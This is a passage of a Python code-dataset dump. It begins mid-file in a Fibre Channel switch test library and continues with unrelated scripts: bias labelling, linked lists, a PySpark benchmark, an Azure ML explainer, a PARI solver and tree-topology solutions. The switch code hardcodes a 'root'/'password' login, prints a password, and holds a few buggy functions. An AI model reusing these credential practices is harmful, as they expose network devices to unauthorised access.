sys.argv[7]\n test_file = '/home/RunFromHere/ini/SwitchMatrix.csv'\n csv_file = csv.DictReader(open(test_file, 'r'), delimiter=',', quotechar='\"')\n fcr_state = switch_status()\n state = fcr_state['fcr_enabled']\n if state is True:\n anturlar.fos_cmd(\"switchdisable\")\n print('\\n\\nSleeping: 10')\n liabhar.JustSleep(10)\n enabled = switch_status()\n if enabled['fcr_enabled'] is True:\n anturlar.fos_cmd(\"switchenable\")\n print('\\n\\nSleeping: 10')\n liabhar.JustSleep(10)\n print(\"\\n\\nENABLE/DISABLE TEST PASSED\")\n else:\n pass\n else:\n print(\"\\n\\nENABLE/DISABLE TEST FAILED\")\n print(\"Please enable fcr for this test and try again\")\n sys.exit(0)\n print('\\n\\nSleeping: 10')\n liabhar.JustSleep(10)\n si = anturlar.SwitchInfo()\n cn = si.chassisname()\n a = cofra.switch_power_off_on(cn, 'off')\n print('\\n\\nSleeping: 20')\n liabhar.JustSleep(20)\n a = cofra.switch_power_off_on(cn, 'on')\n print('\\n\\nSleeping: 120')\n liabhar.JustSleep(120)\n anturlar.connect_tel_noparse(host, user, password)\n si = anturlar.SwitchInfo()\n print(\"GETTINGFCRSTATE\")\n fcr_state = switch_status()\n state = fcr_state['fcr_enabled']\n if state is True:\n print('Reboot Complete. FCR State remains consistent')\n print('TEST PASSED')\n else:\n print('FCR State changed.')\n print('TEST FAILED')\n \ndef fcr_state_persist_disabled():\n host = (sys.argv[1])\n user = sys.argv[2]\n password = sys.argv[7]\n test_file = '/home/RunFromHere/ini/SwitchMatrix.csv'\n csv_file = csv.DictReader(open(test_file, 'r'), delimiter=',', quotechar='\"')\n fcr_state = switch_status()\n state = fcr_state['fcr_enabled']\n if state is False: #the same to here disabled is false, enabled is true\n anturlar.fos_cmd(\"switchdisable\")\n print('\\n\\nSleeping: 10')\n liabhar.JustSleep(10)\n enabled = switch_status()\n if enabled['fcr_enabled'] is False:\n anturlar.fos_cmd(\"switchenable\")\n print('\\n\\nSleeping: 10')\n liabhar.JustSleep(10)\n print(\"\\n\\nENABLE/DISABLE TEST PASSED\")\n else:\n pass\n else:\n print(\"\\n\\nENABLE/DISABLE TEST FAILED\")\n print(\"Please disable fcr for this test and try again\")\n sys.exit(0)\n print('\\n\\nSleeping: 10')\n liabhar.JustSleep(10)\n si = anturlar.SwitchInfo()\n cn = si.chassisname()\n a = cofra.switch_power_off_on(cn, 'off')\n print('\\n\\nSleeping: 20')\n liabhar.JustSleep(20)\n a = cofra.switch_power_off_on(cn, 'on')\n print('\\n\\nSleeping: 120')\n liabhar.JustSleep(120)\n anturlar.connect_tel_noparse(host, user, password)\n fcr_state = switch_status()\n state = fcr_state['fcr_enabled']\n if state is False:\n print('Reboot Complete. FCR State remains consistent')\n print('TEST PASSED')\n else:\n print('FCR State changed.')\n print('TEST FAILED')\n\n sys.exit(0)#######################\n \ndef firmwaredownload(frmdwn, frmup):\n \"\"\"\n uses cofra firmwaredownload to do testing for update to\n newest code\n \n the test will load first firmware and return to the other on a second\n download command\n \"\"\"\n \n capture_cmd = anturlar.fos_cmd(\"ipaddrshow\")\n #match = re.search('(?P[\\s+\\S+]+:([\\d\\.]){7,15}(?=\\\\r\\\\n))', capture_cmd)\n match = re.search('(?P
([\\s+\\w+]+):\\s?(?P[0-9\\.]{1,15}))', capture_cmd)\n    if match:\n        myip = (match.group('ip'))\n        #return(myip)\n    else:\n        print(\"\\n\\n NO IP FOUND \\n\\n\")\n        #return (0)\n    \n    while True:\n    #f = cofra.doFirmwareDownload(frmdwn)\n        capture_cmd = anturlar.fos_cmd(\"version\")\n        f = cofra.DoFirmwaredownloadChoice(frmdwn,frmup)\n\n        liabhar.count_down(600)\n        \n        anturlar.connect_tel_noparse(myip, 'root', 'password')\n        #en = anturlar.SwitchInfo()\n        capture_cmd = anturlar.fos_cmd(\"version\")\n        \n        f = cofra.DoFirmwaredownloadChoice(frmdwn, frmup)\n    \n        anturlar.connect_tel_noparse(myip, 'root', 'password')\n        #en = anturlar.SwitchInfo()\n\n    return(0)\n    \ndef license_restore(): #### NEED TO ADD supportftp settings AND Timeserver\n    \"\"\"\n    Ned to replace sys.argv statements as the order can change on the cli input by user\n    \"\"\"\n    host = sys.argv[1]\n    user = sys.argv[2]\n    password = sys.argv[7]\n    print(password)\n    si = anturlar.SwitchInfo()\n    cn = si.chassisname()\n    test_file = '/home/RunFromHere/ini/SwitchLicenses.csv'\n    csv_file = csv.DictReader(open(test_file, 'r'), delimiter=',', quotechar='\"')\n    for line in csv_file:\n        a = (type(line))\n        switch_name = (line['Nickname'])\n        if switch_name == cn[0]:\n            del (line[''])\n            del (line ['Nickname'])\n            del (line['IP Address'])\n            a = (list(line.values()))\n            for i in a:\n                if i != (''):\n                    anturlar.fos_cmd(\"licenseadd %s\" % i)\n                    liabhar.JustSleep(5)\n    anturlar.fos_cmd(\"echo y | reboot\")\n    print('\\n\\nSleeping: 150')\n    liabhar.JustSleep(150)   \n    anturlar.connect_tel_noparse(host, user, \"password\")\n    anturlar.fos_cmd('licenseshow')\n    return(True)\n\ndef reboot_sequence(iterations, ip):\n    \"\"\"\n    iterations and IP are passed in via the .txt file referred to in initial CLI.\n    \"\"\"\n    try:\n        while True:\n            number = (int(input('Enter the number of iterations you would ike to run: ')))\n            print(number)\n    except EOFError:\n        pass\n    print(\"The End\")\n    sys.exit(0)\n    #print(\"WTF!!\")\n    cs = cofra.SwitchUpdate(ip)\n    iteration = iterations\n    while iterations >= 1:\n        cs.reboot_reconnect()\n        iterations -= 1\n        cons_out = anturlar.fos_cmd(\"lsanzoneshow -s | grep Invalid\")\n        print(cons_out)\n        print(\"NUMBER OF ITERATIONS LEFT: %s\" % iterations)\n    print(\"Numer of iterations run without error is %s\" % iteration)\n    sys.exit(0)\n        \ndef switch_command_loop(iterations):\n    while iterations >= 1:\n        cmd = anturlar.fos_cmd(\"lsanzoneshow -s | grep 50:06:01:69:3e:a0:5a:be\")\n        print(cmd)\n        print(\"ITERATIONS LEFT TO PERFORM: %s\" % iterations)\n        liabhar.JustSleep(2)\n        iterations -= 1   \n    print('DONEDONEDONEDONEDONE')\n    sys.exit()\n    \ndef timeserversetup():\n    cmd = anturlar.fos_cmd(\"tsclockserver 10.38.2.80; tstimezone America/Denver\")\n    print(cmd)\n    ha_failover()\n    cmd = anturlar.fos_cmd(\"date\") \n    print(cmd)\n    return (cmd)\n\ndef autoftpsetup():\n    cmd = anturlar.fos_cmd(supportftp -S)\n    print(cmd)\n\ndef all_ex_ports_with_edge_fid():\n    \"\"\"\n        Capture all ex ports for both Chassis and Pizza Box using \"switchshow\" command, \n    \"\"\"\n    si =anturlar.SwitchInfo()\n    anturlar.fos_cmd(\"setcontext %s\" % si.base_check()) ###################NEW\n    capture_cmd = si.__getportlist__(\"EX-Port\")\n    print(capture_cmd)\n    length = len(capture_cmd)\n    print(length)\n    ex = []\n    for i in capture_cmd:\n        slot = i[0]\n        port = i[1]\n        a = anturlar.fos_cmd(\"portcfgexport %s/%s\" % (slot, port))\n        fid = (re.findall('Edge Fabric ID:\\s+(\\d{1,3})', a))\n        fid = int(fid[0])\n        ex_list = [slot, port, fid]\n        ex.append(ex_list)\n    print(\"YYYYYYYYYYYYYYYYYY\")\n    print(ex)\n    print(\"ZZZZZZZZZZZZZZZZZZ\")\n    print(ex[1])\n    sys.exit()\n    return(ex)\n\ndef def_zone_reset(fid1, fid2):\n    si = anturlar.SwitchInfo()\n    sleep = liabhar.count_down(3)\n    g = [fid1, fid2]\n    for i in g:\n        anturlar.fos_cmd(\"setcontext %s\" % i)\n        a = str(si.ae_ports())\n        b = a.strip('[')\n        b = b.strip(']')\n        index = (b[0])\n        port = (b[1])\n        reg_ex = [b\"no] \"]  ### Needs to be square brackets to send as a list\n        z = anturlar.fos_cmd_regex(\"defzone --allaccess\", reg_ex, 9) #### use regex because return is something other than \"root:\"\n        anturlar.fos_cmd(\"yes\")\n        sleep\n        y = anturlar.fos_cmd_regex(\"cfgsave\", reg_ex, 9)\n        anturlar.fos_cmd(\"yes\")\n        sleep\n        for i in port:\n            anturlar.fos_cmd(\" portdisable %s\" % port)\n            sleep\n            anturlar.fos_cmd(\" portenable %s\" % port)\n        sleep\n        anturlar.fos_cmd(\"switchshow\")\n    sys.exit()\n    \ndef create_ls(number_of_ls):\n    si = anturlar.SwitchInfo()\n    #sleep = liabhar.count_down(10)\n    a = number_of_ls\n    print(a)\n    print(\"9999999999999999999999999999999999999999999\")\n    reg_ex = [b\"[y/n]?:\"]\n    for i in a:\n        print(i)\n        print(type(i))\n        #sys.exit()\n        z = anturlar.fos_cmd_regex(\"lscfg --create %s\" % i, reg_ex, 9) #### use regex because return is something other than \"root:\"\n        anturlar.fos_cmd(\"y\")\n        anturlar.fos_cmd(\"lscfg --show\")\n        #sleep\n    print(\"done\")\n\n        \nclass ReverseData():\n    \"\"\"EXAMPLE ITERATOR - Iterator for looping over a sequence backwards.\"\"\"\n    def __init__(self, data):\n        self.data = data\n        self.index = len(data)\n\n    def __iter__(self):\n        return self\n\n    def __next__(self):\n        if self.index == 0:\n            raise StopIteration\n        self.index = self.index - 1\n        return self.data[self.index]   \n\ndef test():\n    rev=ScriptRuns(5)\n    #print(iter(rev))\n    for i in rev:\n        print(i)\n        PortFlapper.main()\n\nclass ScriptRuns():\n    \"\"\"Iterator for looping over a sequence backwards.\"\"\"\n    def __init__(self, times):\n        self.times = times\n        #self.index = len(data)\n\n    def __iter__(self):\n        return self\n\n    def __next__(self):\n        if self.times == 0:\n            raise StopIteration\n        self.times = self.times - 1\n        #PortFlapper\n        #print(self.times)\n        #return self.data[self.index]\n        return self.times\n    \ndef reverse():\n    print(\"***********************************\")\n    print(\"IN FUNTION NOW\")\n    print(\"***********************************\")\n    print(data)\n    for index in range(len(data) -1, -1, -1):\n        yield data[index]\n        for char in reverse(\"golf\"):\n            print(char)    \n        \n# def wtf(data):\n#     #     yield data[index]\n#     #     #print(a)\n#     for char in reverse(\"golf\"):\n#         print(char)\n\n","sub_path":"lib/FCR/fcr_tools.py","file_name":"fcr_tools.py","file_ext":"py","file_size_in_byte":29017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"101392396","text":"import os\nimport sys\nimport csv\n\noccupations = {}\nfor row in csv.DictReader(open(\"../data/occupations-stats.tsv\", 'r'), delimiter='\\t'):\n    occupations[row[\"occupation\"]] = float(row[\"bls_pct_female\"])\n\ntsv_in = csv.DictReader(open(\"../data/all_sentences.tsv\", 'r'), delimiter='\\t')\nheader = [\"sentid\", \"sentence\", \"gotcha\"]\ntsv_out = csv.DictWriter(open(\"../data/all_sentences_gotcha.tsv\", 'w'), delimiter='\\t', fieldnames=header)\ntsv_out.writeheader()\n\nfor row in tsv_in:\n\n    \"\"\"\n    (1) pronoun==female AND answer==0 AND occupation IS NOT majority-female\n    OR\n    (2) pronoun==female AND answer==1 AND occupation IS majority-female\n    OR\n    (3) pronoun==male AND answer==0 AND occupation IS majority-female\n    OR\n    (4) pronoun==male AND answer==1 AND occupation IS NOT majority-female\n    \"\"\"\n\n    occupation, participant, answer, gender, _ = row[\"sentid\"].split('.')\n    print(occupation, participant, answer, gender)\n\n    is_gotcha = False\n\n    if gender==\"female\" and answer=='0' and not occupations[occupation] > 50.0:\n        is_gotcha = True\n\n    if gender==\"female\" and answer=='1' and occupations[occupation] > 50.0:\n        is_gotcha = True\n        \n    if gender==\"male\" and answer=='0' and occupations[occupation] > 50.0:\n        is_gotcha = True\n\n    if gender==\"male\" and answer=='1' and not occupations[occupation] > 50.0:\n        is_gotcha = True\n\n    row[\"gotcha\"] = 1 if is_gotcha else 0\n\n    tsv_out.writerow(row)\n\n","sub_path":"scripts/add_gotcha.py","file_name":"add_gotcha.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"248858558","text":"\"\"\"\n实现单链表、循环链表、双向链表,支持增删操作\n实现单链表反转\n实现两个有序的链表合并为一个有序链表\n实现求链表的中间结点\n\"\"\"\nimport math\n\n\nclass Node(object):\n    def __init__(self, value):\n        self.data = value\n        self.next = None\n\n\nclass LinkedList:\n    # 初始化,头结点为空\n    def __init__(self):\n        self.head = None\n\n    # 添加节点,添加的新节点作为新的头结点\n    def prepend(self, data):\n        new_node = Node(data)\n        new_node.next = self.head\n        self.head = new_node\n\n    def append(self, data):\n        if not self.head:\n            self.head = Node(data)\n            return\n        p = self.head\n        while p.next:\n            p = p.next\n        p.next = Node(data)\n\n    def insert(self, data, key):\n        tmp = Node(data)\n        p = self.head\n        for i in range(key - 1):\n            p = p.next\n        tmp.next = p.next\n        p.next = tmp\n\n    def search(self, data):\n        current = self.head\n        while current is not None:\n            if current.data == data:\n                return True\n            current = current.next\n        return False\n\n    def remove(self, data):\n        current = self.head\n        pre = None\n        while current is not None:\n            if current.data == data:\n                if current == self.head:\n                    self.head = self.head.next\n                    return\n                pre.next = current.next\n                return\n            pre = current\n            current = current.next\n\n    # 判断链表是否为空\n    def is_empty(self):\n        return not self.head\n\n    # 返回链表长度\n    def size(self):\n        count = 0\n        counting = self.head  # 从头结点开始计数\n        while counting is not None:\n            count += 1\n            counting = counting.next\n        return count\n\n    # 翻转链表\n    def reverse(self):\n        p = self.head\n        q = self.head.next\n        p.next = None\n        while q:\n            r = q.next\n            q.next = p\n            p = q\n            q = r\n        return p\n\n\n#  实现两个有序的链表合并为一个有序链表\n\ndef combine(l1, l2):\n    if l1 is None and l2 is None:\n        return None\n    pre = Node(0)\n    while l1 is not None and l2 is not None:\n        if l1.val < l2.val:\n            pre.next = l1\n            l1 = l1.next\n        else:\n            pre.next = l2\n            l2 = l2.next\n        pre = pre.next\n    if l1 is not None:\n        pre.next = l1\n    else:\n        pre.next = l2\n    return pre.next\n\n\n# leetcode 876 链表的中间结点 python实现\nclass Solution:\n    def middle_node(self, head):\n        # 首先要知道链表一共有多少个结点\n        count = 0\n        res = {}\n        while head is not None:\n            count += 1\n            res[count] = head\n            head = head.next\n        j = math.ceil((count - 1) / 2) + 1\n        return res[j]\n","sub_path":"raw/datastructre/linkedlist/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"639807778","text":"import pandas as pd\nimport numpy as np\nimport timeit\nfrom pyspark.sql import SparkSession\n\nspark = SparkSession\\\n        .builder\\\n        .appName(\"pyspark_benchmark\")\\\n        .getOrCreate()\n\ndf = pd.DataFrame(np.random.randint(-2147483648, 2147483647,size=(100000, 10)), columns=list('ABCDEFGHIJ'))\nsdf = spark.createDataFrame(df)\n\ndef run():\n    global sdf\n    return sdf.collect()\n\nprint(timeit.timeit(run, number = 1))\n","sub_path":"pyspark_sdf_collect_benchmark/pyspark_sdf_collect_benchmark.py","file_name":"pyspark_sdf_collect_benchmark.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"271835391","text":"# --------------------------------------------------------------\r\n# Training Script for the explainer Job\r\n# --------------------------------------------------------------\r\n\r\nfrom azureml.core import Run\r\n\r\n# Get the run context\r\nnew_run = Run.get_context()\r\n\r\n\r\n# Get the workspace from the run\r\nws = new_run.experiment.workspace\r\n\r\n\r\n# Get parameters\r\nimport argparse\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"--input-data\", type=str)\r\n\r\nargs = parser.parse_args()\r\n\r\n\r\n\r\n\r\n# --------------------------------------------------------\r\n# Do your stuff here\r\n# --------------------------------------------------------\r\nimport pandas as pd\r\n\r\n# Load the data from the local files\r\ndf = new_run.input_datasets['raw_data'].to_pandas_dataframe()\r\n\r\n\r\n# Create Dummy variables - Not required in designer\r\ndataPrep = pd.get_dummies(df, drop_first=True)\r\n\r\n\r\n# Create X and Y Variables\r\nX = dataPrep.iloc[:, :-1]\r\nY = dataPrep.iloc[:, -1]\r\n\r\n\r\n# Split Data - X and Y datasets are training and testing sets\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nX_train, X_test, Y_train, Y_test = \\\r\ntrain_test_split(X, Y, test_size = 0.3, random_state = 1234, stratify=Y)\r\n\r\n\r\n# Build the Random Forest model\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nrfc = RandomForestClassifier(random_state=1234)\r\n\r\n# Fit the data to the Random Forest object - Train Model\r\ntrained_model = rfc.fit(X_train, Y_train)\r\n\r\n\r\n# Predict the outcome using Test data - Score Model \r\nY_predict = rfc.predict(X_test)\r\n\r\n# Get the probability score - Scored Probabilities\r\nY_prob = rfc.predict_proba(X_test)[:, 1]\r\n\r\n# Get Confusion matrix and the accuracy/score - Evaluate\r\nfrom sklearn.metrics import confusion_matrix\r\ncm    = confusion_matrix(Y_test, Y_predict)\r\nscore = rfc.score(X_test, Y_test)\r\n\r\n\r\n# Always log the primary metric\r\nnew_run.log(\"accuracy\", score)\r\n\r\n# Get explanation\r\nfrom interpret.ext.blackbox import TabularExplainer\r\n\r\nfeatures = list(X.columns)\r\nclasses = ['notGreater', 'Greater']\r\n\r\ntab_explainer = TabularExplainer(trained_model, \r\n                              X_train, \r\n                              features=features, \r\n                              classes=classes)\r\n\r\nexplanation = tab_explainer.explain_global(X_train)\r\n\r\n\r\n# Upload the explanations to the workspace\r\nfrom azureml.interpret import ExplanationClient\r\n\r\n# Create explanation client\r\nexplain_client = ExplanationClient.from_run(new_run)\r\n\r\n# Upload the explanations\r\nexplain_client.upload_model_explanation(explanation,\r\n                                        comment=\"My First Explanations\")\r\n\r\n\r\n# Complete the run\r\nnew_run.complete()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Azure Scripts/360 - Model explain script.py","file_name":"360 - Model explain script.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"500513863","text":"from .polynomial import Polynomial\nfrom .fieldExtensions import my_rnfequation\n\ntry:\n    from sage.libs.pari.gen import pari\nexcept ImportError:\n    try:\n        from sage.libs.pari.pari_instance import pari as pari\n    except:\n        from cypari.gen import pari\n\n\n# The methods in this file can be used to find solutions as roots in a\n# fixed polynomial from a Groebner basis.\n#\n# More precisely, the input is a list of polynomials (of type\n# snappy.ptolemy.Polynomial) of a redued Groebner basis (lexicographic term\n# order) of a zero-dimensional  prime ideal.\n#\n# The output is a dictionary\n#           variable_name -> pari_object\n# where pari_object is something like 4/5 (if solutions are in Q) or\n# Mod(x, x^2+1) (if solutions are in a number field).\n\n# We assume that x occurs in no polynomial.\n\n# This is broken down in three steps.\n\n# Step 1: Split into extensions and assingments\n#    extensions, assignments = extensions_and_assignments(polys)\n\n# Split the list of polynomials into two lists, the first list\n# contains triples (poly, var, degree) forming a tower of\n# field extensons and the second group is a dictionary assigning\n# all remaining variables polynomials in the variables in the tower.\n\n# Example:\n# 1. a - t^3 + 1\n# 2. s^2 + t\n# 3. t^4 + 1\n# 4. b - 2\n#\n# 3. is the only univariate and non-linear polynomial, it will be\n# the first polynomial in extensions\n# 2. is a polynomial that contains only one other variable besides t,\n# so it will be the next polynomial in extensions\n#\n# So extensions will be [(t^4, t, 4), (s^2, s, 2)].\n#\n# All remaining variables can be expressed in the field resulting from\n# these two extensions, so polynomial 1. and 4. become assignments.\n#\n# So assignments will be { 'a': t^3 - 1, 'b': 2}.\n#\n# extensions will be empty if the solutions are in Q.\n    \n# Step 2: Process the extensions\n#    number_field, ext_assignments = process_extensions_to_pari(extensions)\n#\n# number_field will be a polynomial in x such that each solution\n# to the zero-dimensional ideal can be written as polynomial in a root\n# of number_field\n#\n# ext_assignments assigns polynomials in x to the variables\n\n# Step 3: Subsituiting\n#    assignments = update_assignments_and_merge(assignments, ext_assignments)\n    \n# The other variables are given as polynomials in the variables from\n# the field extension tower, do the substituition to convert them\n# into polynomials in x\n\ndef _only_var_left_in_poly(poly, extension_vars):\n    '''\n    Checks whether that there is only one other variable besides\n    the variables in extension_vars.\n    In other words, if the variables in extension_vars are bound,\n    checks that the polynomial has only one free variable and returns\n    its name.\n    '''\n\n    vars_left = set(poly.variables()) - set(extension_vars)\n    no_vars_left = len(vars_left)\n    assert no_vars_left > 0\n    if no_vars_left > 1:\n        return None\n    return list(vars_left)[0]\n\ndef _next_var_and_poly(polys, extension_vars):\n    '''\n    Applies _only_var_left_in_poly to find a polynomial that has\n    one free variable and returns pair (variable, polynomial).\n    '''\n\n    for poly in polys:\n        var = _only_var_left_in_poly(poly, extension_vars)\n        if var:\n            return (poly, var)\n\n    raise Exception(\"Could not find polynomial becoming univariate after \"\n                    \"substituition, the Groebner basis you are tryin to \"\n                    \"solve is probably not in lexicographic order or of a \"\n                    \"0-dimensional ideal!\")\n\ndef _remove(l, element):\n    '''\n    Returns a copy of list without element.\n    '''\n    return [x for x in l if not x is element]\n\ndef extensions_and_assignments(polys):\n    '''\n    Splits into extensions and assignments s in example given above\n    in _exact_solutions.\n    '''\n\n    extensions = [ ] # extension polynomials\n    extension_vars = [ ]\n    assignments = { } # pure assignments\n\n    # Iterate while polys left\n    while polys:\n\n        # extension_vars are already pushed onto the tower of field\n        # extensions and so are bound, find the next polynomial with\n        # exactly one free variable. Remove it from the list that needs\n        # processing.\n\n        poly, var = _next_var_and_poly(polys, extension_vars)\n        polys = _remove(polys, poly)\n\n        degree = poly.degree(var)\n\n        # If the polynomial is linear, then we do not need a field extension\n        if degree == 1:\n            # The polynomial is of the form a - t^3 + s where a is free,\n            # so the assignment would be a -> t^3 - s.\n            # Because we have a reduced Groebner basis, the polynomial is monic\n            # So we can just take the following difference:\n\n            value = Polynomial.from_variable_name(var) - poly\n            assert not var in value.variables()\n            assert not var in assignments\n            assignments[var] = value\n\n        else:\n            # We have a field extension, add it to the list\n            extensions.append((poly, var, degree))\n            extension_vars.append(var)\n\n    return extensions, assignments\n\ndef update_assignments_and_merge(assignments, d):\n\n    variables = sorted(set(\n            sum([poly.variables() for poly in assignments.values()], [])))\n\n    monomial_to_value = { (): pari(1) }\n\n    for var in variables:\n        max_degree = max([poly.degree(var) for poly in assignments.values()])\n\n        old_keys = list(monomial_to_value.keys())\n        \n        v = d[var]\n        power_of_v = pari(1)\n\n        for degree in range(1, max_degree + 1):\n            power_of_v = power_of_v * v\n\n            for old_key in old_keys:\n                old_value = monomial_to_value[old_key]\n                new_key = old_key + ((var, degree),)\n                new_value = old_value * power_of_v\n                monomial_to_value[new_key] = new_value\n\n    def eval_monomial(monomial):\n        return (\n            pari(monomial.get_coefficient()) *\n            monomial_to_value[monomial.get_vars()])\n\n    def substitute(poly):\n        return sum(\n            [eval_monomial(m) for m in poly.get_monomials()],\n            pari(0))\n\n    new_assignments = dict([(key, substitute(poly))\n                            for key, poly in assignments.items()])\n\n    # Merge all the assignments of variables\n    new_assignments.update(d)\n    new_assignments['1'] = pari(1)\n    \n    return new_assignments\n\ndef _process_extensions(extensions):\n    '''\n    Given a tower of field extensions, find the number field defining\n    polynomial and write all variables in terms of the root in that\n    polynomial.\n    '''\n\n    # Bail if no extensions\n    if not extensions:\n        return None, {}\n\n    # The first extension is over Q and special\n    poly, var, degree = extensions[0]\n\n    # Just rename the variable of the polynomial by x\n    ext_assignments = { var: Polynomial.from_variable_name('x') }\n    number_field = poly.substitute(ext_assignments)\n    \n    # Process the other extensions\n    # number_field is the polynomial in x definining the number field\n    # obtained so far in the tower\n    for extension in extensions[1:]:\n\n        # Get next extension\n        poly, var, degree = extension\n\n        # Replace all variables previously occuring in the tower\n        # by polynomials in x\n        poly = poly.substitute(ext_assignments)\n\n        # Use rnfequation\n        number_field, old_x_in_new_x, k = (\n            my_rnfequation(number_field, poly))\n\n        # The new number field is again in x but the assignments\n        # are assigning polynomials in the old x.\n        # Need to update.\n        ext_assignments = dict(\n            [(key, poly.substitute({'x' : old_x_in_new_x}))\n             for key, poly in ext_assignments.items()])\n\n        # And compute what the root of the last polynomial was\n        # to assign it.\n        ext_assignments[var] = (\n              Polynomial.from_variable_name('x')\n            - Polynomial.constant_polynomial(k) * old_x_in_new_x)\n    \n    return number_field, ext_assignments\n\ndef _number_field_and_ext_assignment_to_pari(number_field, ext_assignment):\n    # Convert the number_field into a pari polynomial, or None if over Q\n    if number_field:\n        pari_number_field = pari(number_field)\n    else:\n        pari_number_field = None\n    \n    # Convert the assignemnts to variables involved in the field extension\n    # tower into pari Mod objects\n    def item_to_pari(item):\n        key, value = item\n        if pari_number_field:\n            return key, pari(value).Mod(pari_number_field)\n        else:\n            return key, pari(value)\n\n    pari_ext_assignment = dict([ item_to_pari(item)\n                            for item in ext_assignment.items()])\n\n    return pari_number_field, pari_ext_assignment\n\ndef process_extensions_to_pari(extensions):\n    '''\n    Similar to _process_extensions but returns pari objects.\n    '''\n\n    number_field, ext_assignments = _process_extensions(extensions)\n\n    # Convert the number_field into a pari polynomial, or None if over Q\n    # Similarly, convert the assignments to variables involved in the\n    # field extension tower into pari Mod object\n\n    return _number_field_and_ext_assignment_to_pari(\n            number_field, ext_assignments)\n","sub_path":"venv/Lib/site-packages/snappy-2.3.1-py2.7-win32.egg/snappy/ptolemy/solutionsToPrimeIdealGroebnerBasis.py","file_name":"solutionsToPrimeIdealGroebnerBasis.py","file_ext":"py","file_size_in_byte":9224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"493155195","text":"\"\"\"\nContains configuration data for interacting with the source_data folder.\nThese are hardcoded here as this is meant to be a dumping \nground. Source_data is not actually user configurable.\n\nFor customized data loading, use mhwdata.io directly.\n\"\"\"\n\nsupported_ranks = ('LR', 'HR')\n\n\"A mapping of all translations\"\nall_languages = {\n    'en': \"English\",\n    'ja': \"Japanese\"\n}\n\n\"A list of languages that require complete translations. Used in validation\"\nrequired_languages = ('en',)\n\n\"A list of languages that can be exported\"\nsupported_languages = ('en', 'ja')\n\n\"Languages that are designated as potentially incomplete\"\nincomplete_languages = ('ja',)\n\n\"List of all possible armor parts\"\narmor_parts = ('head', 'chest', 'arms', 'waist', 'legs')\n\n\"Maximum number of items in a recipe\"\nmax_recipe_item_count = 4\n\n\"Maximum number of skills in an armor piece/weapon\"\nmax_skill_count = 2\n\nicon_colors = [\n    \"Gray\", \"White\", \"Lime\", \"Green\", \"Cyan\", \"Blue\", \"Violet\", \"Orange\",\n    \"Pink\", \"Red\", \"DarkRed\", \"LightBeige\", \"Beige\", \"DarkBeige\", \"Yellow\",\n    \"Gold\", \"DarkGreen\", \"DarkPurple\"\n]","sub_path":"mhdata/cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"554050873","text":"\"\"\"\nProblem: Number of Binary Tree Topologies\nProblem Statement: https://www.algoexpert.io/questions/Number%20Of%20Binary%20Tree%20Topologies\nNTID: NT-121\nCategory: Recursions\nDifficulty: Extreme\nSprint: 2205.01\nEngineer: Saarthak Sangamnerkar\nDate: 05/07/2022\n\"\"\"\n\n\n# Naïve Recursive Solution -> O(n*(2n)!/(n!(n+1)!)) time | O(n) space\ndef numberOfBinaryTreeTopologies(n):\n    # Write your code here.\n    if n == 0:\n        return 1\n    numberOfTreeTopologies = 0\n    for leftTreeSize in range(n):\n        rightTreeSize = n - leftTreeSize - 1  # n - 1 because we always have a root\n        numberOfTreeTopologies += numberOfBinaryTreeTopologies(leftTreeSize) * numberOfBinaryTreeTopologies(\n            rightTreeSize)\n\n    return numberOfTreeTopologies\n\n\n# Optimized Recursive Solution -> O(n^2) time | O(n) space\ndef numberOfBinaryTreeTopologies(n, cache={0: 1}):\n    # Write your code here.\n    if n in cache:\n        return cache[n]\n    numberOfTreeTopologies = 0\n    for leftTreeSize in range(n):\n        rightTreeSize = n - leftTreeSize - 1  # n - 1 because we always have a root\n        numberOfTreeTopologies += numberOfBinaryTreeTopologies(leftTreeSize, cache) * numberOfBinaryTreeTopologies(\n            rightTreeSize, cache)\n    cache[n] = numberOfTreeTopologies\n    return numberOfTreeTopologies\n\n\n# Optimized Iterative Solution -> O(n^2) time | O(n) space\ndef numberOfBinaryTreeTopologies(n):\n    # Write your code here.\n    cache = [1]\n    for m in range(1, n + 1):\n        numberOfTreeTopologies = 0\n        for leftTreeSize in range(m):\n            rightTreeSize = m - leftTreeSize - 1  # m - 1 because we always have a root\n            numberOfTreeTopologies += cache[leftTreeSize] * cache[rightTreeSize]\n        cache.append(numberOfTreeTopologies)\n    return cache[-1]\n","sub_path":"Recursions/NT_121_Number_of_Binary_Tree_Topologies.py","file_name":"NT_121_Number_of_Binary_Tree_Topologies.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
